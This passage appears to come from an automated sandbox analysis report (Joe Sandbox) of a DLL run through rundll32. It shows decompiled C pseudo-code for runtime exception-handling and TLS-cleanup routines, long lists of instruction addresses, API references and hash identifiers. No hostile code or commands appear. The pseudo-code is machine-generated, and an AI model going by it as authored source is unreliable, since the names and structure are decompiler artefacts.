                                                                                                                                                                                      											E6E9EFF7C(_t274, _t279, _t300, _t305, _t319, __eflags);
                                                                                                                                                                                      											goto L66;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}























































































                                                                                                                                                                                      0x6e9ef6f6
                                                                                                                                                                                      0x6e9ef6fd
                                                                                                                                                                                      0x6e9ef6ff
                                                                                                                                                                                      0x6e9ef708
                                                                                                                                                                                      0x6e9ef70e
                                                                                                                                                                                      0x6e9ef716
                                                                                                                                                                                      0x6e9ef718
                                                                                                                                                                                      0x6e9ef71b
                                                                                                                                                                                      0x6e9ef721
                                                                                                                                                                                      0x6e9efa9a
                                                                                                                                                                                      0x6e9efa9a
                                                                                                                                                                                      0x6e9efa9f
                                                                                                                                                                                      0x6e9efaa1
                                                                                                                                                                                      0x6e9efaa3
                                                                                                                                                                                      0x6e9efaa6
                                                                                                                                                                                      0x6e9efaa7
                                                                                                                                                                                      0x6e9efaaa
                                                                                                                                                                                      0x6e9efab0
                                                                                                                                                                                      0x6e9efbcf
                                                                                                                                                                                      0x6e9efab6
                                                                                                                                                                                      0x6e9efab6
                                                                                                                                                                                      0x6e9efab7
                                                                                                                                                                                      0x6e9efab8
                                                                                                                                                                                      0x6e9efabf
                                                                                                                                                                                      0x6e9efac2
                                                                                                                                                                                      0x6e9efac5
                                                                                                                                                                                      0x6e9efacb
                                                                                                                                                                                      0x6e9efacd
                                                                                                                                                                                      0x6e9efad2
                                                                                                                                                                                      0x6e9efad5
                                                                                                                                                                                      0x6e9efad7
                                                                                                                                                                                      0x6e9efadd
                                                                                                                                                                                      0x6e9efadf
                                                                                                                                                                                      0x6e9efae5
                                                                                                                                                                                      0x6e9efafa
                                                                                                                                                                                      0x6e9efaff
                                                                                                                                                                                      0x6e9efb02
                                                                                                                                                                                      0x6e9efb04
                                                                                                                                                                                      0x6e9efbcb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efbcc
                                                                                                                                                                                      0x6e9efb04
                                                                                                                                                                                      0x6e9efae5
                                                                                                                                                                                      0x6e9efadd
                                                                                                                                                                                      0x6e9efad5
                                                                                                                                                                                      0x6e9efb0a
                                                                                                                                                                                      0x6e9efb0d
                                                                                                                                                                                      0x6e9efb10
                                                                                                                                                                                      0x6e9efb13
                                                                                                                                                                                      0x6e9efb16
                                                                                                                                                                                      0x6e9efb1c
                                                                                                                                                                                      0x6e9efb2e
                                                                                                                                                                                      0x6e9efb33
                                                                                                                                                                                      0x6e9efb36
                                                                                                                                                                                      0x6e9efb39
                                                                                                                                                                                      0x6e9efb3c
                                                                                                                                                                                      0x6e9efb3f
                                                                                                                                                                                      0x6e9efb42
                                                                                                                                                                                      0x6e9efb45
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efb4b
                                                                                                                                                                                      0x6e9efb4b
                                                                                                                                                                                      0x6e9efb4e
                                                                                                                                                                                      0x6e9efb51
                                                                                                                                                                                      0x6e9efb60
                                                                                                                                                                                      0x6e9efb61
                                                                                                                                                                                      0x6e9efb61
                                                                                                                                                                                      0x6e9efb63
                                                                                                                                                                                      0x6e9efb66
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efb68
                                                                                                                                                                                      0x6e9efb6b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efb79
                                                                                                                                                                                      0x6e9efb7b
                                                                                                                                                                                      0x6e9efb7e
                                                                                                                                                                                      0x6e9efb80
                                                                                                                                                                                      0x6e9efb88
                                                                                                                                                                                      0x6e9efb88
                                                                                                                                                                                      0x6e9efb8b
                                                                                                                                                                                      0x6e9efb8d
                                                                                                                                                                                      0x6e9efb8f
                                                                                                                                                                                      0x6e9efbab
                                                                                                                                                                                      0x6e9efbb0
                                                                                                                                                                                      0x6e9efbb3
                                                                                                                                                                                      0x6e9efbb3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efb8b
                                                                                                                                                                                      0x6e9efb82
                                                                                                                                                                                      0x6e9efb86
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efbb6
                                                                                                                                                                                      0x6e9efbb9
                                                                                                                                                                                      0x6e9efbba
                                                                                                                                                                                      0x6e9efbbd
                                                                                                                                                                                      0x6e9efbc0
                                                                                                                                                                                      0x6e9efbc3
                                                                                                                                                                                      0x6e9efbc6
                                                                                                                                                                                      0x6e9efbc6
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efb51
                                                                                                                                                                                      0x6e9efbd0
                                                                                                                                                                                      0x6e9efbd5
                                                                                                                                                                                      0x6e9efbd6
                                                                                                                                                                                      0x6e9efbd9
                                                                                                                                                                                      0x6e9efbdc
                                                                                                                                                                                      0x6e9efbdd
                                                                                                                                                                                      0x6e9efbde
                                                                                                                                                                                      0x6e9efbdf
                                                                                                                                                                                      0x6e9efbe2
                                                                                                                                                                                      0x6e9efbe4
                                                                                                                                                                                      0x6e9efc5c
                                                                                                                                                                                      0x6e9efc5e
                                                                                                                                                                                      0x6e9efc5e
                                                                                                                                                                                      0x6e9efbe6
                                                                                                                                                                                      0x6e9efbe6
                                                                                                                                                                                      0x6e9efbe9
                                                                                                                                                                                      0x6e9efbec
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efbee
                                                                                                                                                                                      0x6e9efbee
                                                                                                                                                                                      0x6e9efbf1
                                                                                                                                                                                      0x6e9efbf4
                                                                                                                                                                                      0x6e9efbfb
                                                                                                                                                                                      0x6e9efbfb
                                                                                                                                                                                      0x6e9efbfe
                                                                                                                                                                                      0x6e9efc00
                                                                                                                                                                                      0x6e9efc02
                                                                                                                                                                                      0x6e9efc34
                                                                                                                                                                                      0x6e9efc34
                                                                                                                                                                                      0x6e9efc37
                                                                                                                                                                                      0x6e9efc3e
                                                                                                                                                                                      0x6e9efc3e
                                                                                                                                                                                      0x6e9efc41
                                                                                                                                                                                      0x6e9efc44
                                                                                                                                                                                      0x6e9efc4b
                                                                                                                                                                                      0x6e9efc4b
                                                                                                                                                                                      0x6e9efc4e
                                                                                                                                                                                      0x6e9efc55
                                                                                                                                                                                      0x6e9efc57
                                                                                                                                                                                      0x6e9efc57
                                                                                                                                                                                      0x6e9efc50
                                                                                                                                                                                      0x6e9efc50
                                                                                                                                                                                      0x6e9efc53
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efc53
                                                                                                                                                                                      0x6e9efc46
                                                                                                                                                                                      0x6e9efc46
                                                                                                                                                                                      0x6e9efc49
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efc49
                                                                                                                                                                                      0x6e9efc39
                                                                                                                                                                                      0x6e9efc39
                                                                                                                                                                                      0x6e9efc3c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efc3c
                                                                                                                                                                                      0x6e9efc58
                                                                                                                                                                                      0x6e9efc04
                                                                                                                                                                                      0x6e9efc04
                                                                                                                                                                                      0x6e9efc04
                                                                                                                                                                                      0x6e9efc07
                                                                                                                                                                                      0x6e9efc07
                                                                                                                                                                                      0x6e9efc09
                                                                                                                                                                                      0x6e9efc0b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efc0d
                                                                                                                                                                                      0x6e9efc0f
                                                                                                                                                                                      0x6e9efc23
                                                                                                                                                                                      0x6e9efc23
                                                                                                                                                                                      0x6e9efc11
                                                                                                                                                                                      0x6e9efc11
                                                                                                                                                                                      0x6e9efc14
                                                                                                                                                                                      0x6e9efc17
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efc19
                                                                                                                                                                                      0x6e9efc19
                                                                                                                                                                                      0x6e9efc1c
                                                                                                                                                                                      0x6e9efc1f
                                                                                                                                                                                      0x6e9efc21
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efc21
                                                                                                                                                                                      0x6e9efc17
                                                                                                                                                                                      0x6e9efc2c
                                                                                                                                                                                      0x6e9efc2c
                                                                                                                                                                                      0x6e9efc2e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efc30
                                                                                                                                                                                      0x6e9efc30
                                                                                                                                                                                      0x6e9efc30
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efc2e
                                                                                                                                                                                      0x6e9efc27
                                                                                                                                                                                      0x6e9efc29
                                                                                                                                                                                      0x6e9efc29
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efc29
                                                                                                                                                                                      0x6e9efbf6
                                                                                                                                                                                      0x6e9efbf6
                                                                                                                                                                                      0x6e9efbf9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efbf9
                                                                                                                                                                                      0x6e9efbf4
                                                                                                                                                                                      0x6e9efbec
                                                                                                                                                                                      0x6e9efc5f
                                                                                                                                                                                      0x6e9efc63
                                                                                                                                                                                      0x6e9efc63
                                                                                                                                                                                      0x6e9ef730
                                                                                                                                                                                      0x6e9ef730
                                                                                                                                                                                      0x6e9ef739
                                                                                                                                                                                      0x6e9ef836
                                                                                                                                                                                      0x6e9ef836
                                                                                                                                                                                      0x6e9ef839
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef768
                                                                                                                                                                                      0x6e9ef768
                                                                                                                                                                                      0x6e9ef76d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef773
                                                                                                                                                                                      0x6e9ef773
                                                                                                                                                                                      0x6e9ef77b
                                                                                                                                                                                      0x6e9efa34
                                                                                                                                                                                      0x6e9efa38
                                                                                                                                                                                      0x6e9ef781
                                                                                                                                                                                      0x6e9ef786
                                                                                                                                                                                      0x6e9ef789
                                                                                                                                                                                      0x6e9ef78e
                                                                                                                                                                                      0x6e9ef795
                                                                                                                                                                                      0x6e9ef79a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef7d2
                                                                                                                                                                                      0x6e9ef7da
                                                                                                                                                                                      0x6e9ef83e
                                                                                                                                                                                      0x6e9ef83e
                                                                                                                                                                                      0x6e9ef841
                                                                                                                                                                                      0x6e9ef844
                                                                                                                                                                                      0x6e9ef846
                                                                                                                                                                                      0x6e9ef849
                                                                                                                                                                                      0x6e9ef84c
                                                                                                                                                                                      0x6e9ef852
                                                                                                                                                                                      0x6e9efa03
                                                                                                                                                                                      0x6e9efa03
                                                                                                                                                                                      0x6e9efa06
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efa08
                                                                                                                                                                                      0x6e9efa08
                                                                                                                                                                                      0x6e9efa0b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efa11
                                                                                                                                                                                      0x6e9efa11
                                                                                                                                                                                      0x6e9efa14
                                                                                                                                                                                      0x6e9efa17
                                                                                                                                                                                      0x6e9efa18
                                                                                                                                                                                      0x6e9efa19
                                                                                                                                                                                      0x6e9efa1c
                                                                                                                                                                                      0x6e9efa1d
                                                                                                                                                                                      0x6e9efa20
                                                                                                                                                                                      0x6e9efa21
                                                                                                                                                                                      0x6e9efa26
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efa26
                                                                                                                                                                                      0x6e9efa0b
                                                                                                                                                                                      0x6e9ef858
                                                                                                                                                                                      0x6e9ef858
                                                                                                                                                                                      0x6e9ef85c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef862
                                                                                                                                                                                      0x6e9ef862
                                                                                                                                                                                      0x6e9ef869
                                                                                                                                                                                      0x6e9ef881
                                                                                                                                                                                      0x6e9ef881
                                                                                                                                                                                      0x6e9ef884
                                                                                                                                                                                      0x6e9ef887
                                                                                                                                                                                      0x6e9ef88d
                                                                                                                                                                                      0x6e9ef89d
                                                                                                                                                                                      0x6e9ef8a2
                                                                                                                                                                                      0x6e9ef8a5
                                                                                                                                                                                      0x6e9ef8a8
                                                                                                                                                                                      0x6e9ef8ab
                                                                                                                                                                                      0x6e9ef8ae
                                                                                                                                                                                      0x6e9ef8b1
                                                                                                                                                                                      0x6e9ef8b4
                                                                                                                                                                                      0x6e9ef8ba
                                                                                                                                                                                      0x6e9ef8ba
                                                                                                                                                                                      0x6e9ef8bd
                                                                                                                                                                                      0x6e9ef8c0
                                                                                                                                                                                      0x6e9ef8cf
                                                                                                                                                                                      0x6e9ef8d0
                                                                                                                                                                                      0x6e9ef8d0
                                                                                                                                                                                      0x6e9ef8d2
                                                                                                                                                                                      0x6e9ef8d5
                                                                                                                                                                                      0x6e9ef8db
                                                                                                                                                                                      0x6e9ef8de
                                                                                                                                                                                      0x6e9ef8e4
                                                                                                                                                                                      0x6e9ef8e6
                                                                                                                                                                                      0x6e9ef8e9
                                                                                                                                                                                      0x6e9ef8ec
                                                                                                                                                                                      0x6e9ef8f5
                                                                                                                                                                                      0x6e9ef8f8
                                                                                                                                                                                      0x6e9ef8fa
                                                                                                                                                                                      0x6e9ef8fa
                                                                                                                                                                                      0x6e9ef8fd
                                                                                                                                                                                      0x6e9ef900
                                                                                                                                                                                      0x6e9ef903
                                                                                                                                                                                      0x6e9ef906
                                                                                                                                                                                      0x6e9ef909
                                                                                                                                                                                      0x6e9ef90e
                                                                                                                                                                                      0x6e9ef90f
                                                                                                                                                                                      0x6e9ef910
                                                                                                                                                                                      0x6e9ef911
                                                                                                                                                                                      0x6e9ef912
                                                                                                                                                                                      0x6e9ef915
                                                                                                                                                                                      0x6e9ef917
                                                                                                                                                                                      0x6e9ef919
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef91b
                                                                                                                                                                                      0x6e9ef91b
                                                                                                                                                                                      0x6e9ef91b
                                                                                                                                                                                      0x6e9ef91e
                                                                                                                                                                                      0x6e9ef921
                                                                                                                                                                                      0x6e9ef923
                                                                                                                                                                                      0x6e9ef924
                                                                                                                                                                                      0x6e9ef929
                                                                                                                                                                                      0x6e9ef92c
                                                                                                                                                                                      0x6e9ef92e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef930
                                                                                                                                                                                      0x6e9ef931
                                                                                                                                                                                      0x6e9ef934
                                                                                                                                                                                      0x6e9ef936
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef938
                                                                                                                                                                                      0x6e9ef938
                                                                                                                                                                                      0x6e9ef93b
                                                                                                                                                                                      0x6e9ef93e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef93e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef936
                                                                                                                                                                                      0x6e9ef952
                                                                                                                                                                                      0x6e9ef958
                                                                                                                                                                                      0x6e9ef975
                                                                                                                                                                                      0x6e9ef97a
                                                                                                                                                                                      0x6e9ef97a
                                                                                                                                                                                      0x6e9ef97d
                                                                                                                                                                                      0x6e9ef97d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef941
                                                                                                                                                                                      0x6e9ef941
                                                                                                                                                                                      0x6e9ef942
                                                                                                                                                                                      0x6e9ef945
                                                                                                                                                                                      0x6e9ef948
                                                                                                                                                                                      0x6e9ef94b
                                                                                                                                                                                      0x6e9ef94b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef950
                                                                                                                                                                                      0x6e9ef8ec
                                                                                                                                                                                      0x6e9ef8de
                                                                                                                                                                                      0x6e9ef980
                                                                                                                                                                                      0x6e9ef983
                                                                                                                                                                                      0x6e9ef984
                                                                                                                                                                                      0x6e9ef987
                                                                                                                                                                                      0x6e9ef98a
                                                                                                                                                                                      0x6e9ef98d
                                                                                                                                                                                      0x6e9ef990
                                                                                                                                                                                      0x6e9ef990
                                                                                                                                                                                      0x6e9ef999
                                                                                                                                                                                      0x6e9ef99c
                                                                                                                                                                                      0x6e9ef99c
                                                                                                                                                                                      0x6e9ef8b4
                                                                                                                                                                                      0x6e9ef99f
                                                                                                                                                                                      0x6e9ef9a3
                                                                                                                                                                                      0x6e9ef9a5
                                                                                                                                                                                      0x6e9ef9a8
                                                                                                                                                                                      0x6e9ef9ae
                                                                                                                                                                                      0x6e9ef9ae
                                                                                                                                                                                      0x6e9ef9b6
                                                                                                                                                                                      0x6e9ef9bb
                                                                                                                                                                                      0x6e9efa29
                                                                                                                                                                                      0x6e9efa29
                                                                                                                                                                                      0x6e9efa2e
                                                                                                                                                                                      0x6e9efa32
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef9bd
                                                                                                                                                                                      0x6e9ef9bd
                                                                                                                                                                                      0x6e9ef9c1
                                                                                                                                                                                      0x6e9ef9d3
                                                                                                                                                                                      0x6e9ef9d6
                                                                                                                                                                                      0x6e9ef9d9
                                                                                                                                                                                      0x6e9ef9db
                                                                                                                                                                                      0x6e9ef9f2
                                                                                                                                                                                      0x6e9ef9f6
                                                                                                                                                                                      0x6e9ef9fc
                                                                                                                                                                                      0x6e9ef9fd
                                                                                                                                                                                      0x6e9ef9ff
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efa01
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efa01
                                                                                                                                                                                      0x6e9ef9dd
                                                                                                                                                                                      0x6e9ef9e2
                                                                                                                                                                                      0x6e9ef9e5
                                                                                                                                                                                      0x6e9ef9ea
                                                                                                                                                                                      0x6e9ef9ed
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef9ed
                                                                                                                                                                                      0x6e9ef9c3
                                                                                                                                                                                      0x6e9ef9c6
                                                                                                                                                                                      0x6e9ef9c9
                                                                                                                                                                                      0x6e9ef9cb
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef9cd
                                                                                                                                                                                      0x6e9ef9cd
                                                                                                                                                                                      0x6e9ef9d1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef9d1
                                                                                                                                                                                      0x6e9ef9cb
                                                                                                                                                                                      0x6e9ef9c1
                                                                                                                                                                                      0x6e9ef86b
                                                                                                                                                                                      0x6e9ef86b
                                                                                                                                                                                      0x6e9ef872
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef874
                                                                                                                                                                                      0x6e9ef874
                                                                                                                                                                                      0x6e9ef87b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef87b
                                                                                                                                                                                      0x6e9ef872
                                                                                                                                                                                      0x6e9ef869
                                                                                                                                                                                      0x6e9ef85c
                                                                                                                                                                                      0x6e9ef7dc
                                                                                                                                                                                      0x6e9ef7e4
                                                                                                                                                                                      0x6e9ef7e7
                                                                                                                                                                                      0x6e9ef7ec
                                                                                                                                                                                      0x6e9ef7f0
                                                                                                                                                                                      0x6e9ef7f3
                                                                                                                                                                                      0x6e9ef7f9
                                                                                                                                                                                      0x6e9ef7fc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef7fe
                                                                                                                                                                                      0x6e9ef7fe
                                                                                                                                                                                      0x6e9ef801
                                                                                                                                                                                      0x6e9ef803
                                                                                                                                                                                      0x6e9efa39
                                                                                                                                                                                      0x6e9efa39
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef809
                                                                                                                                                                                      0x6e9ef811
                                                                                                                                                                                      0x6e9ef81c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef825
                                                                                                                                                                                      0x6e9ef828
                                                                                                                                                                                      0x6e9ef829
                                                                                                                                                                                      0x6e9ef82c
                                                                                                                                                                                      0x6e9ef82e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef834
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef834
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ef82e
                                                                                                                                                                                      0x6e9ef809
                                                                                                                                                                                      0x6e9efa3e
                                                                                                                                                                                      0x6e9efa3e
                                                                                                                                                                                      0x6e9efa40
                                                                                                                                                                                      0x6e9efa41
                                                                                                                                                                                      0x6e9efa48
                                                                                                                                                                                      0x6e9efa4b
                                                                                                                                                                                      0x6e9efa59
                                                                                                                                                                                      0x6e9efa5e
                                                                                                                                                                                      0x6e9efa63
                                                                                                                                                                                      0x6e9efa66
                                                                                                                                                                                      0x6e9efa6b
                                                                                                                                                                                      0x6e9efa6e
                                                                                                                                                                                      0x6e9efa71
                                                                                                                                                                                      0x6e9efa73
                                                                                                                                                                                      0x6e9efa75
                                                                                                                                                                                      0x6e9efa75
                                                                                                                                                                                      0x6e9efa7a
                                                                                                                                                                                      0x6e9efa86
                                                                                                                                                                                      0x6e9efa8c
                                                                                                                                                                                      0x6e9efa91
                                                                                                                                                                                      0x6e9efa94
                                                                                                                                                                                      0x6e9efa95
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9efa95
                                                                                                                                                                                      0x6e9ef7fc
                                                                                                                                                                                      0x6e9ef7da
                                                                                                                                                                                      0x6e9ef79a
                                                                                                                                                                                      0x6e9ef77b
                                                                                                                                                                                      0x6e9ef76d
                                                                                                                                                                                      0x6e9ef739

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 6E9EF7F3
                                                                                                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 6E9EF815
                                                                                                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 6E9EF924
                                                                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 6E9EF9F6
                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 6E9EFA7A
                                                                                                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 6E9EFA95
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000003.00000002.533794908.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000003.00000002.533790341.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533812681.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533838172.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533844049.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000003.00000002.533848975.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6e9d0000_rundll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                      • API String ID: 2123188842-393685449
                                                                                                                                                                                      • Opcode ID: 224304857fea044cb346da4869edda7463c7927c1ab1c2f631513e20da6a6daf
                                                                                                                                                                                      • Instruction ID: 7086f57a778fc3f75746f0911c1b5e5ef5c7d70de86fbe033270a245ce6e4ddd
                                                                                                                                                                                      • Opcode Fuzzy Hash: 224304857fea044cb346da4869edda7463c7927c1ab1c2f631513e20da6a6daf
                                                                                                                                                                                      • Instruction Fuzzy Hash: B3B18E3180020AEFCF16CFE4E8909DEB7B9BF58318B24455BEA116BA15E331D952CF91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 58%
                                                                                                                                                                                      			E6E9DC340() {
                                                                                                                                                                                      				intOrPtr _t25;
                                                                                                                                                                                      				intOrPtr _t26;
                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                      				void* _t28;
                                                                                                                                                                                      				void* _t29;
                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                      				void* _t31;
                                                                                                                                                                                      				signed char _t42;
                                                                                                                                                                                      				signed char _t43;
                                                                                                                                                                                      				signed char _t44;
                                                                                                                                                                                      				signed char _t45;
                                                                                                                                                                                      				intOrPtr* _t52;
                                                                                                                                                                                      				intOrPtr* _t53;
                                                                                                                                                                                      				intOrPtr* _t54;
                                                                                                                                                                                      				intOrPtr* _t55;
                                                                                                                                                                                      				intOrPtr* _t56;
                                                                                                                                                                                      				void* _t57;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t25 =  *((intOrPtr*)(_t57 + 0x18));
                                                                                                                                                                                      				if(_t25 == 3 || _t25 == 0) {
                                                                                                                                                                                      					_t52 =  *0x6ea2e12c; // 0x0
                                                                                                                                                                                      					if(_t52 == 0) {
                                                                                                                                                                                      						goto L26;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t42 = 0;
                                                                                                                                                                                      					do {
                                                                                                                                                                                      						_t27 = TlsGetValue( *(_t52 + 4));
                                                                                                                                                                                      						if(_t27 != 0) {
                                                                                                                                                                                      							TlsSetValue( *(_t52 + 4), 0);
                                                                                                                                                                                      							 *_t52(_t27);
                                                                                                                                                                                      							_t57 = _t57 + 4;
                                                                                                                                                                                      							_t42 = 1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t52 =  *((intOrPtr*)(_t52 + 8));
                                                                                                                                                                                      					} while (_t52 != 0);
                                                                                                                                                                                      					if((_t42 & 0x00000001) == 0) {
                                                                                                                                                                                      						goto L26;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t53 =  *0x6ea2e12c; // 0x0
                                                                                                                                                                                      					if(_t53 == 0) {
                                                                                                                                                                                      						goto L26;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t43 = 0;
                                                                                                                                                                                      					do {
                                                                                                                                                                                      						_t28 = TlsGetValue( *(_t53 + 4));
                                                                                                                                                                                      						if(_t28 != 0) {
                                                                                                                                                                                      							TlsSetValue( *(_t53 + 4), 0);
                                                                                                                                                                                      							 *_t53(_t28);
                                                                                                                                                                                      							_t57 = _t57 + 4;
                                                                                                                                                                                      							_t43 = 1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t53 =  *((intOrPtr*)(_t53 + 8));
                                                                                                                                                                                      					} while (_t53 != 0);
                                                                                                                                                                                      					if((_t43 & 0x00000001) == 0) {
                                                                                                                                                                                      						goto L26;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t54 =  *0x6ea2e12c; // 0x0
                                                                                                                                                                                      					if(_t54 == 0) {
                                                                                                                                                                                      						goto L26;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t44 = 0;
                                                                                                                                                                                      					do {
                                                                                                                                                                                      						_t29 = TlsGetValue( *(_t54 + 4));
                                                                                                                                                                                      						if(_t29 != 0) {
                                                                                                                                                                                      							TlsSetValue( *(_t54 + 4), 0);
                                                                                                                                                                                      							 *_t54(_t29);
                                                                                                                                                                                      							_t57 = _t57 + 4;
                                                                                                                                                                                      							_t44 = 1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t54 =  *((intOrPtr*)(_t54 + 8));
                                                                                                                                                                                      					} while (_t54 != 0);
                                                                                                                                                                                      					if((_t44 & 0x00000001) == 0) {
                                                                                                                                                                                      						goto L26;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t55 =  *0x6ea2e12c; // 0x0
                                                                                                                                                                                      					if(_t55 == 0) {
                                                                                                                                                                                      						goto L26;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t45 = 0;
                                                                                                                                                                                      					do {
                                                                                                                                                                                      						_t30 = TlsGetValue( *(_t55 + 4));
                                                                                                                                                                                      						if(_t30 != 0) {
                                                                                                                                                                                      							TlsSetValue( *(_t55 + 4), 0);
                                                                                                                                                                                      							 *_t55(_t30);
                                                                                                                                                                                      							_t57 = _t57 + 4;
                                                                                                                                                                                      							_t45 = 1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t55 =  *((intOrPtr*)(_t55 + 8));
                                                                                                                                                                                      					} while (_t55 != 0);
                                                                                                                                                                                      					if((_t45 & 0x00000001) != 0) {
                                                                                                                                                                                      						_t56 =  *0x6ea2e12c; // 0x0
                                                                                                                                                                                      						while(_t56 != 0) {
                                                                                                                                                                                      							_t31 = TlsGetValue( *(_t56 + 4));
                                                                                                                                                                                      							if(_t31 != 0) {
                                                                                                                                                                                      								TlsSetValue( *(_t56 + 4), 0);
                                                                                                                                                                                      								 *_t56(_t31);
                                                                                                                                                                                      								_t57 = _t57 + 4;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							_t56 =  *((intOrPtr*)(_t56 + 8));
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					goto L26;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					L26:
                                                                                                                                                                                      					_t26 =  *0x6ea2a300; // 0x70
                                                                                                                                                                                      					return _t26;
